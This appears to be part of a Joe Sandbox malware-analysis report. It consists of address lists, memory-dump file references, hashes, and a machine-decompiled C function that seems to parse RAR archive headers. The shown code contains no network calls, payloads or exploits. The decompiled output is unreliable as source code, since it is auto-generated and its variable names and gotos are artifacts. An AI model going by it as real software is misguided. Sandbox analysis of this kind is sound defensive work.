0x00e8e66b
0x00e8e66e
0x00e8e670
0x00e8e672
0x00e8e672
0x00e8e675
0x00e8e676
0x00e8e676
0x00e8e67b
0x00e8e67e
0x00e8e682
0x00e8e682
0x00e8e683
0x00e8e685
0x00e8e68b
0x00e8e691
0x00000000
0x00000000
0x00000000
0x00e8e691
0x00e8e5c4
0x00e8e697
0x00e8e697
0x00000000
0x00e8e697
0x00e8d41c
0x00e8d413
0x00e8d40a
0x00e8d3c1
0x00e8d3c5
0x00e8d3cd
0x00000000
0x00e8d3cf
0x00e8d3d5
0x00e8d3da
0x00e8e6b6
0x00e8e6b6
0x00e8e6b9
0x00e8e6c4
0x00e8e6ef
0x00e8e6f0
0x00e8e6f1
0x00e8e6f2
0x00e8e6f3
0x00e8e6f4
0x00e8e6f9
0x00e8e701
0x00e8e706
0x00e8e70c
0x00e8e711
0x00e8e712
0x00e8e712
0x00e8e712
0x00e8e718
0x00e8e719
0x00e8e719
0x00e8e71c
0x00e8e722
0x00000000
0x00000000
0x00e8e724
0x00e8e729
0x00e8e72c
0x00e8e72e
0x00e8e736
0x00e8e738
0x00e8e73a
0x00e8e73f
0x00e8e742
0x00e8e748
0x00e8e74b
0x00e8e74d
0x00e8e74d
0x00e8e74d
0x00e8e74d
0x00e8e74b
0x00e8e750
0x00e8e75c
0x00e8e762
0x00e8e76a
0x00e8e76f
0x00e8e770
0x00e8e775
0x00e8e775
0x00e8e775
0x00e8e775
0x00e8e779
0x00e8e779
0x00e8e77c
0x00e8e783
0x00e8e790
0x00e8e6c6
0x00e8e6c6
0x00e8e6c6
0x00e8e6d0
0x00e8e6d9
0x00e8e6de
0x00e8e6ec
0x00e8e6ec
0x00e8e6c4
0x00e8d3cd

APIs

__floor_pentium4.LIBCMT ref: 00E8D4A4

Strings

1#QNAN, xrefs: 00E8E6AA
1#SNAN, xrefs: 00E8E6A3
1#IND, xrefs: 00E8E69C
1#INF, xrefs: 00E8E6B1

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 76d522e0cd2f82184bee9f9f1265de2c2d68e29959d2cf5efaf53fe7d3c9e82b
Instruction ID: badb01b0e74a4c9dc71f3ab194ddffaa40bb4de2e1de405eb34380183a016bae
Opcode Fuzzy Hash: 76d522e0cd2f82184bee9f9f1265de2c2d68e29959d2cf5efaf53fe7d3c9e82b
Instruction Fuzzy Hash: BFC21A71E086288FDB25EE28DD407EAB7B5EB44319F1551EAD84DF7280E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 00E6276D Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00E6276D(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t334;
				signed int _t338;
				char _t357;
				signed short _t364;
				signed int _t369;
				signed int _t376;
				signed char _t379;
				signed char _t382;
				char _t399;
				signed int _t400;
				signed int _t404;
				signed char _t418;
				intOrPtr _t419;
				char _t420;
				signed int _t423;
				signed int _t424;
				signed char _t429;
				signed int _t432;
				signed int _t436;
				signed short _t441;
				signed short _t446;
				unsigned int _t451;
				signed int _t454;
				void* _t457;
				signed int _t459;
				signed int _t462;
				void* _t469;
				signed int _t475;
				unsigned int _t480;
				void* _t481;
				void* _t488;
				void* _t489;
				signed char _t495;
				signed int _t509;
				intOrPtr* _t523;
				signed int _t526;
				signed int _t527;
				intOrPtr* _t528;
				signed int _t536;
				signed int _t541;
				signed int _t543;
				unsigned int _t552;
				signed int _t554;
				signed int _t567;
				signed char _t569;
				signed int _t570;
				void* _t593;
				signed int _t597;
				signed int _t609;
				signed int _t611;
				signed int _t613;
				unsigned int _t620;
				signed char _t636;
				signed char _t647;
				signed int _t650;
				unsigned int _t651;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				signed int _t658;
				unsigned int _t660;
				signed int _t664;
				void* _t665;
				void* _t672;
				signed int _t675;
				signed int _t676;
				signed char _t677;
				signed int _t680;
				void* _t682;
				signed int _t688;
				signed int _t689;
				void* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t705;
				signed int _t706;
				intOrPtr _t709;
				void* _t710;
				signed char _t719;

				_t528 = __ecx;
				E00E7E554(E00E91FC9, _t710);
				E00E7E630();
				_t523 = _t528;
				 *((intOrPtr*)(_t710 + 0x20)) = _t523;
				E00E6C769(_t710 + 0x24, _t523);
				 *((intOrPtr*)(_t710 + 0x1c)) = 0;
				 *((intOrPtr*)(_t710 - 4)) = 0;
				_t664 = 7;
				if( *(_t523 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t710 + 0x5f)) = 0;
					L7:
					_push(_t664);
					E00E6C974();
					if( *((intOrPtr*)(_t710 + 0x3c)) != 0) {
						 *(_t523 + 0x21e4) = E00E6C7AF(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f4) = 0;
						_t688 = E00E6C797(_t710 + 0x24) & 0x000000ff;
						_t334 = E00E6C7AF(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21ec) = _t334;
						 *(_t523 + 0x21f4) = _t334 >> 0x0000000e & 0x00000001;
						_t536 = E00E6C7AF(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f0) = _t536;
						 *(_t523 + 0x21e8) = _t688;
						__eflags = _t536 - _t664;
						if(_t536 >= _t664) {
							_t689 = _t688 - 0x73;
							__eflags = _t689;
							if(_t689 == 0) {
								 *(_t523 + 0x21e8) = 1;
							} else {
								_t705 = _t689 - 1;
								__eflags = _t705;
								if(_t705 == 0) {
									 *(_t523 + 0x21e8) = 2;
								} else {
									_t706 = _t705 - 6;
									__eflags = _t706;
									if(_t706 == 0) {
										 *(_t523 + 0x21e8) = 3;
									} else {
										__eflags = _t706 == 1;
										if(_t706 == 1) {
											 *(_t523 + 0x21e8) = 5;
										}
									}
								}
							}
							_t338 =  *(_t523 + 0x21e8);
							 *(_t523 + 0x21dc) = _t338;
							__eflags = _t338 - 0x75;
							if(_t338 != 0x75) {
								__eflags = _t338 - 1;
								if(_t338 != 1) {
									L23:
									_push(_t536 - 7);
									L24:
									E00E6C974();
									 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca0)) + E00E61944(_t523,  *(_t523 + 0x21f0));
									_t541 =  *(_t523 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t523 + 0x6cac) =  *(_t523 + 0x6ca4);
									 *(_t710 + 0x50) = _t541;
									__eflags = _t541 - 1;
									if(__eflags == 0) {
										_t665 = _t523 + 0x2208;
										E00E6AEBC(_t665);
										_t543 = 5;
										memcpy(_t665, _t523 + 0x21e4, _t543 << 2);
										 *(_t523 + 0x221c) = E00E6C7AF(_t710 + 0x24);
										_t647 = E00E6C7E4(_t710 + 0x24);
										 *(_t523 + 0x2220) = _t647;
										 *(_t523 + 0x6cb5) =  *(_t523 + 0x2210) & 0x00000001;
										 *(_t523 + 0x6cb4) =  *(_t523 + 0x2210) >> 0x00000003 & 0x00000001;
										_t552 =  *(_t523 + 0x2210);
										 *(_t523 + 0x6cb7) = _t552 >> 0x00000002 & 0x00000001;
										 *(_t523 + 0x6cbb) = _t552 >> 0x00000006 & 0x00000001;
										 *(_t523 + 0x6cbc) = _t552 >> 0x00000007 & 0x00000001;
										__eflags = _t647;
										if(_t647 != 0) {
											L119:
											_t357 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t523 + 0x6cb8)) = _t357;
											 *(_t523 + 0x2224) = _t552 >> 0x00000001 & 0x00000001;
											_t554 = _t552 >> 0x00000004 & 0x00000001;
											__eflags = _t554;
											 *(_t523 + 0x6cb9) = _t552 >> 0x00000008 & 0x00000001;
											 *(_t523 + 0x6cba) = _t554;
											L121:
											_t664 = 7;
											L122:
											_t364 = E00E6C895(_t710 + 0x24, 0);
											__eflags =  *(_t523 + 0x21e4) - (_t364 & 0x0000ffff);
											if( *(_t523 + 0x21e4) == (_t364 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t710 + 0x1c)) =  *((intOrPtr*)(_t710 + 0x3c));
												goto L133;
											}
											_t369 =  *(_t523 + 0x21e8);
											__eflags = _t369 - 0x79;
											if(_t369 == 0x79) {
												goto L132;
											}
											__eflags = _t369 - 0x76;
											if(_t369 == 0x76) {
												goto L132;
											}
											__eflags = _t369 - 5;
											if(_t369 != 5) {
												L130:
												 *((char*)(_t523 + 0x6cc4)) = 1;
												E00E66FBA(0xea0f50, 3);
												__eflags =  *((char*)(_t710 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00E66D72(__eflags, 4, _t523 + 0x24, _t523 + 0x24);
												 *((char*)(_t523 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t523 + 0x45ae);
											if( *(_t523 + 0x45ae) == 0) {
												goto L130;
											}
											 *0xe93260();
											_t376 =  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))() - _t664;
											__eflags = _t376;
											asm("sbb edx, ecx");
											 *0xe93260(_t376, _t647, 0);
											 *((intOrPtr*)( *_t523 + 0x10))();
											 *(_t710 + 0x5e) = 1;
											do {
												_t379 = E00E69AFD(_t523);
												asm("sbb al, al");
												_t382 =  !( ~_t379) &  *(_t710 + 0x5e);
												 *(_t710 + 0x5e) = _t382;
												_t664 = _t664 - 1;
												__eflags = _t664;
											} while (_t664 != 0);
											__eflags = _t382;
											if(_t382 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t357 = 0;
										__eflags =  *(_t523 + 0x221c);
										if( *(_t523 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t523 + 0x21ec) & 0x00008000;
										if(( *(_t523 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca8)) + E00E6C7E4(_t710 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t541 - 3;
									if(_t541 <= 3) {
										__eflags = _t541 - 2;
										_t64 = (0 | _t541 != 0x00000002) - 1; // -1
										_t672 = (_t64 & 0xffffdcb0) + 0x45d0 + _t523;
										 *(_t710 + 0x48) = _t672;
										E00E6AE22(_t672, 0);
										_t567 = 5;
										memcpy(_t672, _t523 + 0x21e4, _t567 << 2);
										_t695 =  *(_t710 + 0x48);
										_t675 =  *(_t710 + 0x50);
										_t569 =  *(_t695 + 8);
										 *(_t695 + 0x1098) =  *(_t695 + 8) & 1;
										 *(_t695 + 0x1099) = _t569 >> 0x00000001 & 1;
										 *(_t695 + 0x109b) = _t569 >> 0x00000002 & 1;
										 *(_t695 + 0x10a0) = _t569 >> 0x0000000a & 1;
										__eflags = _t675 - 2;
										if(_t675 != 2) {
											L35:
											_t650 = 0;
											__eflags = 0;
											_t399 = 0;
											L36:
											 *((char*)(_t695 + 0x10f0)) = _t399;
											__eflags = _t675 - 2;
											if(_t675 == 2) {
												L39:
												_t400 = _t650;
												L40:
												 *(_t695 + 0x10fa) = _t400;
												_t570 = _t569 & 0x000000e0;
												__eflags = _t570 - 0xe0;
												 *((char*)(_t695 + 0x10f1)) = 0 | _t570 == 0x000000e0;
												__eflags = _t570 - 0xe0;
												if(_t570 != 0xe0) {
													_t651 =  *(_t695 + 8);
													_t404 = 0x10000 << (_t651 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t404 = _t650;
													_t651 =  *(_t695 + 8);
												}
												 *(_t695 + 0x10f4) = _t404;
												 *(_t695 + 0x10f3) = _t651 >> 0x0000000b & 0x00000001;
												 *(_t695 + 0x10f2) = _t651 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t695 + 0x14)) = E00E6C7E4(_t710 + 0x24);
												 *(_t710 + 0x54) = E00E6C7E4(_t710 + 0x24);
												 *((char*)(_t695 + 0x18)) = E00E6C797(_t710 + 0x24);
												 *(_t695 + 0x1070) = 2;
												 *((intOrPtr*)(_t695 + 0x1074)) = E00E6C7E4(_t710 + 0x24);
												 *(_t710 + 0x18) = E00E6C7E4(_t710 + 0x24);
												 *(_t695 + 0x1c) = E00E6C797(_t710 + 0x24) & 0x000000ff;
												 *((char*)(_t695 + 0x20)) = E00E6C797(_t710 + 0x24) - 0x30;
												 *(_t710 + 0x4c) = E00E6C7AF(_t710 + 0x24) & 0x0000ffff;
												_t418 = E00E6C7E4(_t710 + 0x24);
												_t654 =  *(_t695 + 0x1c);
												 *(_t710 + 0x58) = _t418;
												 *(_t695 + 0x24) = _t418;
												__eflags = _t654 - 0x14;
												if(_t654 < 0x14) {
													__eflags = _t418 & 0x00000010;
													if((_t418 & 0x00000010) != 0) {
														 *((char*)(_t695 + 0x10f1)) = 1;
													}
												}
												 *(_t695 + 0x109c) = 0;
												__eflags =  *(_t695 + 0x109b);
												if( *(_t695 + 0x109b) == 0) {
													L55:
													_t419 =  *((intOrPtr*)(_t695 + 0x18));
													 *(_t695 + 0x10fc) = 2;
													__eflags = _t419 - 3;
													if(_t419 == 3) {
														L59:
														 *(_t695 + 0x10fc) = 1;
														L60:
														 *(_t695 + 0x1100) = 0;
														__eflags = _t419 - 3;
														if(_t419 == 3) {
															__eflags = ( *(_t710 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t710 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t695 + 0x1100) = 1;
																 *((short*)(_t695 + 0x1104)) = 0;
															}
														}
														__eflags = _t675 - 2;
														if(_t675 == 2) {
															L66:
															_t420 = 0;
															goto L67;
														} else {
															__eflags =  *(_t695 + 0x24);
															if( *(_t695 + 0x24) >= 0) {
																goto L66;
															}
															_t420 = 1;
															L67:
															 *((char*)(_t695 + 0x10f8)) = _t420;
															_t423 =  *(_t695 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t423;
															 *(_t695 + 0x10f9) = _t423;
															if(_t423 == 0) {
																__eflags =  *(_t710 + 0x54) - 0xffffffff;
																_t647 = 0;
																_t676 = 0;
																_t137 =  *(_t710 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t424 = _t423 & 0xffffff00 | _t137;
																L73:
																 *(_t695 + 0x109a) = _t424;
																 *((intOrPtr*)(_t695 + 0x1058)) = 0 +  *((intOrPtr*)(_t695 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t695 + 0x105c)) = _t676;
																asm("adc edx, ecx");
																 *(_t695 + 0x1060) = 0 +  *(_t710 + 0x54);
																__eflags =  *(_t695 + 0x109a);
																 *(_t695 + 0x1064) = _t647;
																if( *(_t695 + 0x109a) != 0) {
																	 *(_t695 + 0x1060) = 0x7fffffff;
																	 *(_t695 + 0x1064) = 0x7fffffff;
																}
																_t429 =  *(_t710 + 0x4c);
																_t677 = 0x1fff;
																 *(_t710 + 0x54) = 0x1fff;
																__eflags = _t429 - 0x1fff;
																if(_t429 < 0x1fff) {
																	_t677 = _t429;
																	 *(_t710 + 0x54) = _t429;
																}
																E00E6C846(_t710 + 0x24, _t710 - 0x2030, _t677);
																_t432 = 0;
																__eflags =  *(_t710 + 0x50) - 2;
																 *((char*)(_t710 + _t677 - 0x2030)) = 0;
																if( *(_t710 + 0x50) != 2) {
																	 *(_t710 + 0x50) = _t695 + 0x28;
																	_t435 = E00E71692(_t710 - 0x2030, _t695 + 0x28, 0x800);
																	_t680 =  *((intOrPtr*)(_t695 + 0xc)) -  *(_t710 + 0x4c) - 0x20;
																	__eflags =  *(_t695 + 8) & 0x00000400;
																	if(( *(_t695 + 8) & 0x00000400) != 0) {
																		_t680 = _t680 - 8;
																		__eflags = _t680;
																	}
																	__eflags = _t680;
																	if(_t680 <= 0) {
																		_t681 = _t695 + 0x28;
																	} else {
																		 *(_t710 + 0x58) = _t695 + 0x1028;
																		E00E61FB9(_t695 + 0x1028, _t680);
																		_t469 = E00E6C846(_t710 + 0x24,  *(_t695 + 0x1028), _t680);
																		_t681 = _t695 + 0x28;
																		_t435 = E00E838B9(_t469, _t695 + 0x28, L"RR");
																		__eflags = _t435;
																		if(_t435 == 0) {
																			__eflags =  *((intOrPtr*)(_t695 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t695 + 0x102c)) >= 0x14) {
																				_t682 =  *( *(_t710 + 0x58));
																				asm("cdq");
																				_t609 =  *(_t682 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t611 = (_t609 << 8) + ( *(_t682 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t613 = (_t611 << 8) + ( *(_t682 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t475 = (_t613 << 8) + ( *(_t682 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t523 + 0x21c0) = _t475 << 9;
																				 *(_t523 + 0x21c4) = ((((_t647 << 0x00000020 | _t609) << 0x8 << 0x00000020 | _t611) << 0x8 << 0x00000020 | _t613) << 0x8 << 0x00000020 | _t475) << 9;
																				 *0xe93260();
																				_t480 = E00E6FDC7( *(_t523 + 0x21c0),  *(_t523 + 0x21c4),  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))(), _t647);
																				 *(_t523 + 0x21c8) = _t480;
																				 *(_t710 + 0x58) = _t480;
																				_t481 = E00E7E580(_t479, _t647, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t435 = E00E6FDC7(_t481 +  *(_t523 + 0x21c0), _t647, _t479, _t647);
																				_t620 =  *(_t710 + 0x58);
																				_t695 =  *(_t710 + 0x48);
																				_t681 =  *(_t710 + 0x50);
																				__eflags = _t435 - _t620;
																				if(_t435 > _t620) {
																					_t435 = _t620 + 1;
																					 *(_t523 + 0x21c8) = _t620 + 1;
																				}
																			}
																		}
																	}
																	_t436 = E00E838B9(_t435, _t681, L"CMT");
																	__eflags = _t436;
																	if(_t436 == 0) {
																		 *((char*)(_t523 + 0x6cb6)) = 1;
																	}
																} else {
																	_t681 = _t695 + 0x28;
																	 *_t681 = 0;
																	__eflags =  *(_t695 + 8) & 0x00000200;
																	if(( *(_t695 + 8) & 0x00000200) != 0) {
																		E00E66B2C(_t710);
																		_t488 = E00E83900(_t710 - 0x2030);
																		_t647 =  *(_t710 + 0x54);
																		_t489 = _t488 + 1;
																		__eflags = _t647 - _t489;
																		if(_t647 > _t489) {
																			__eflags = _t489 + _t710 - 0x2030;
																			E00E66B3D(_t710, _t710 - 0x2030, _t647, _t489 + _t710 - 0x2030, _t647 - _t489, _t681, 0x800);
																		}
																		_t432 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t681 - _t432;
																	if( *_t681 == _t432) {
																		_push(1);
																		_push(0x800);
																		_push(_t681);
																		_push(_t710 - 0x2030);
																		E00E6FE1D();
																	}
																	E00E62018(_t523, _t695);
																}
																__eflags =  *(_t695 + 8) & 0x00000400;
																if(( *(_t695 + 8) & 0x00000400) != 0) {
																	E00E6C846(_t710 + 0x24, _t695 + 0x10a1, 8);
																}
																E00E70F30( *(_t710 + 0x18));
																__eflags =  *(_t695 + 8) & 0x00001000;
																if(( *(_t695 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t523 + 0x6ca8)) = E00E63DF5( *((intOrPtr*)(_t523 + 0x6ca8)),  *(_t523 + 0x6cac),  *((intOrPtr*)(_t695 + 0x1058)),  *((intOrPtr*)(_t695 + 0x105c)), 0, 0);
																	 *(_t523 + 0x6cac) = _t647;
																	 *((char*)(_t710 + 0x20)) =  *(_t695 + 0x10f2);
																	_t441 = E00E6C895(_t710 + 0x24,  *((intOrPtr*)(_t710 + 0x20)));
																	__eflags =  *_t695 - (_t441 & 0x0000ffff);
																	if( *_t695 != (_t441 & 0x0000ffff)) {
																		 *((char*)(_t523 + 0x6cc4)) = 1;
																		E00E66FBA(0xea0f50, 1);
																		__eflags =  *((char*)(_t710 + 0x5f));
																		if(__eflags == 0) {
																			E00E66D72(__eflags, 0x1c, _t523 + 0x24, _t681);
																		}
																	}
																	goto L121;
																} else {
																	_t446 = E00E6C7AF(_t710 + 0x24);
																	 *((intOrPtr*)(_t710 + 4)) = _t523 + 0x32c0;
																	 *((intOrPtr*)(_t710 + 8)) = _t523 + 0x32c8;
																	 *((intOrPtr*)(_t710 + 0xc)) = _t523 + 0x32d0;
																	__eflags = 0;
																	_t696 = 0;
																	 *((intOrPtr*)(_t710 + 0x10)) = 0;
																	_t451 = _t446 & 0x0000ffff;
																	 *(_t710 + 0x4c) = 0;
																	 *(_t710 + 0x58) = _t451;
																	do {
																		_t593 = 3;
																		_t526 = _t451 >> _t593 - _t696 << 2;
																		__eflags = _t526 & 0x00000008;
																		if((_t526 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t710 + 4 + _t696 * 4);
																		if( *(_t710 + 4 + _t696 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t696;
																		if(__eflags != 0) {
																			E00E70F30(E00E6C7E4(_t710 + 0x24));
																		}
																		E00E70D5A( *(_t710 + 4 + _t696 * 4), _t647, __eflags, _t710 - 0x30);
																		__eflags = _t526 & 0x00000004;
																		if((_t526 & 0x00000004) != 0) {
																			_t249 = _t710 - 0x1c;
																			 *_t249 =  *(_t710 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t710 - 0x18) = 0;
																		_t527 = _t526 & 0x00000003;
																		__eflags = _t527;
																		if(_t527 <= 0) {
																			L109:
																			_t454 = _t597 * 0x64;
																			__eflags = _t454;
																			 *(_t710 - 0x18) = _t454;
																			E00E70F8E( *(_t710 + 4 + _t696 * 4), _t647, _t710 - 0x30);
																			_t451 =  *(_t710 + 0x58);
																		} else {
																			_t457 = 3;
																			_t459 = _t457 - _t527 << 3;
																			__eflags = _t459;
																			 *(_t710 + 0x18) = _t459;
																			_t697 = _t459;
																			do {
																				_t462 = (E00E6C797(_t710 + 0x24) & 0x000000ff) << _t697;
																				_t697 = _t697 + 8;
																				_t597 =  *(_t710 - 0x18) | _t462;
																				 *(_t710 - 0x18) = _t597;
																				_t527 = _t527 - 1;
																				__eflags = _t527;
																			} while (_t527 != 0);
																			_t696 =  *(_t710 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t696 = _t696 + 1;
																		 *(_t710 + 0x4c) = _t696;
																		__eflags = _t696 - 4;
																	} while (_t696 < 4);
																	_t523 =  *((intOrPtr*)(_t710 + 0x20));
																	_t695 =  *(_t710 + 0x48);
																	goto L112;
																}
															}
															_t676 = E00E6C7E4(_t710 + 0x24);
															_t495 = E00E6C7E4(_t710 + 0x24);
															__eflags =  *(_t710 + 0x54) - 0xffffffff;
															_t647 = _t495;
															if( *(_t710 + 0x54) != 0xffffffff) {
																L71:
																_t424 = 0;
																goto L73;
															}
															__eflags = _t647 - 0xffffffff;
															if(_t647 != 0xffffffff) {
																goto L71;
															}
															_t424 = 1;
															goto L73;
														}
													}
													__eflags = _t419 - 5;
													if(_t419 == 5) {
														goto L59;
													}
													__eflags = _t419 - 6;
													if(_t419 < 6) {
														 *(_t695 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t655 = _t654 - 0xd;
													__eflags = _t655;
													if(_t655 == 0) {
														 *(_t695 + 0x109c) = 1;
														goto L55;
													}
													_t657 = _t655;
													__eflags = _t657;
													if(_t657 == 0) {
														 *(_t695 + 0x109c) = 2;
														goto L55;
													}
													_t658 = _t657 - 5;
													__eflags = _t658;
													if(_t658 == 0) {
														L52:
														 *(_t695 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t658 == 6;
													if(_t658 == 6) {
														goto L52;
													}
													 *(_t695 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t569 & 0x00000010;
											if((_t569 & 0x00000010) == 0) {
												goto L39;
											}
											_t400 = 1;
											goto L40;
										}
										__eflags = _t569 & 0x00000010;
										if((_t569 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t399 = 1;
											_t650 = 0;
											goto L36;
										}
									}
									__eflags = _t541 - 5;
									if(_t541 != 5) {
										goto L115;
									} else {
										memcpy(_t523 + 0x4590, _t523 + 0x21e4, _t541 << 2);
										_t660 =  *(_t523 + 0x4598);
										 *(_t523 + 0x45ac) =  *(_t523 + 0x4598) & 0x00000001;
										_t636 = _t660 >> 0x00000001 & 0x00000001;
										_t647 = _t660 >> 0x00000003 & 0x00000001;
										 *(_t523 + 0x45ad) = _t636;
										 *(_t523 + 0x45ae) = _t660 >> 0x00000002 & 0x00000001;
										 *(_t523 + 0x45af) = _t647;
										__eflags = _t636;
										if(_t636 != 0) {
											 *((intOrPtr*)(_t523 + 0x45a4)) = E00E6C7E4(_t710 + 0x24);
										}
										__eflags =  *(_t523 + 0x45af);
										if( *(_t523 + 0x45af) != 0) {
											_t509 = E00E6C7AF(_t710 + 0x24) & 0x0000ffff;
											 *(_t523 + 0x45a8) = _t509;
											 *(_t523 + 0x6cd8) = _t509;
										}
										goto L121;
									}
								}
								__eflags =  *(_t523 + 0x21ec) & 0x00000002;
								if(( *(_t523 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00E61FD3(_t523);
							L133:
							E00E615C2(_t710 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t710 - 0xc));
							return  *((intOrPtr*)(_t710 + 0x1c));
						}
					}
					L8:
					E00E63EF9(_t523, _t647);
					goto L133;
				}
				_t647 =  *((intOrPtr*)(_t523 + 0x6cc0)) + _t664;
				asm("adc eax, ecx");
				_t719 =  *(_t523 + 0x6ca4);
				if(_t719 < 0 || _t719 <= 0 &&  *((intOrPtr*)(_t523 + 0x6ca0)) <= _t647) {
					goto L6;
				} else {
					 *((char*)(_t710 + 0x5f)) = 1;
					E00E63D65(_t523);
					 *0xe93260(_t710 + 0x14, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0xc))))() != 8) {
						goto L8;
					} else {
						_t709 = _t523 + 0x1028;
						E00E661C9(_t709, 0, 4,  *((intOrPtr*)(_t523 + 0x21bc)) + 0x5024, _t710 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t710 + 0x44)) = _t709;
						goto L7;
					}
				}
			}

0x00e6276d
0x00e62776
0x00e62780
0x00e62787
0x00e6278e
0x00e62791
0x00e6279a
0x00e6279d
0x00e627a0
0x00e627a7
0x00e62819
0x00e62819
0x00e6281c
0x00e6281c
0x00e62820
0x00e62829
0x00e62845
0x00e6284b
0x00e6285a
0x00e62862
0x00e62868
0x00e62873
0x00e6287e
0x00e62881
0x00e62887
0x00e6288d
0x00e6288f
0x00e6289d
0x00e6289d
0x00e628a0
0x00e628d5
0x00e628a2
0x00e628a2
0x00e628a2
0x00e628a5
0x00e628c9
0x00e628a7
0x00e628a7
0x00e628a7
0x00e628aa
0x00e628bd
0x00e628ac
0x00e628ac
0x00e628af
0x00e628b1
0x00e628b1
0x00e628af
0x00e628aa
0x00e628a5
0x00e628df
0x00e628e5
0x00e628eb
0x00e628ee
0x00e628f4
0x00e628f7
0x00e62902
0x00e62905
0x00e62906
0x00e62909
0x00e62929
0x00e6292f
0x00e62935
0x00e62938
0x00e6293e
0x00e62941
0x00e62944
0x00e63067
0x00e6306f
0x00e63076
0x00e6307d
0x00e6308a
0x00e6309c
0x00e630a1
0x00e630a7
0x00e630b9
0x00e630bf
0x00e630cc
0x00e630d9
0x00e630e6
0x00e630ec
0x00e630ee
0x00e630fb
0x00e630fd
0x00e630fd
0x00e630fe
0x00e630fe
0x00e6310a
0x00e6311a
0x00e6311a
0x00e6311d
0x00e63123
0x00e63129
0x00e6312b
0x00e6312c
0x00e63131
0x00e63139
0x00e6313f
0x00e631e3
0x00e631e6
0x00000000
0x00e631e6
0x00e63145
0x00e6314b
0x00e6314e
0x00000000
0x00000000
0x00e63154
0x00e63157
0x00000000
0x00000000
0x00e6315d
0x00e63160
0x00e631b5
0x00e631bc
0x00e631c3
0x00e631c8
0x00e631cc
0x00000000
0x00000000
0x00e631d5
0x00e631da
0x00000000
0x00e631da
0x00e63162
0x00e63169
0x00000000
0x00000000
0x00e63172
0x00e63180
0x00e63180
0x00e63183
0x00e6318a
0x00e63192
0x00e63195
0x00e63199
0x00e6319b
0x00e631a2
0x00e631a6
0x00e631a9
0x00e631ac
0x00e631ac
0x00e631ac
0x00e631b1
0x00e631b3
0x00000000
0x00000000
0x00000000
0x00e631b3
0x00e630f0
0x00e630f2
0x00e630f9
0x00000000
0x00000000
0x00000000
0x00e630f9
0x00e6294a
0x00e6303d
0x00e6303d
0x00e63047
0x00e63055
0x00e6305b
0x00e6305b
0x00000000
0x00e63047
0x00e62950
0x00e62953
0x00e629e7
0x00e629ef
0x00e629fe
0x00e62a02
0x00e62a05
0x00e62a0c
0x00e62a15
0x00e62a17
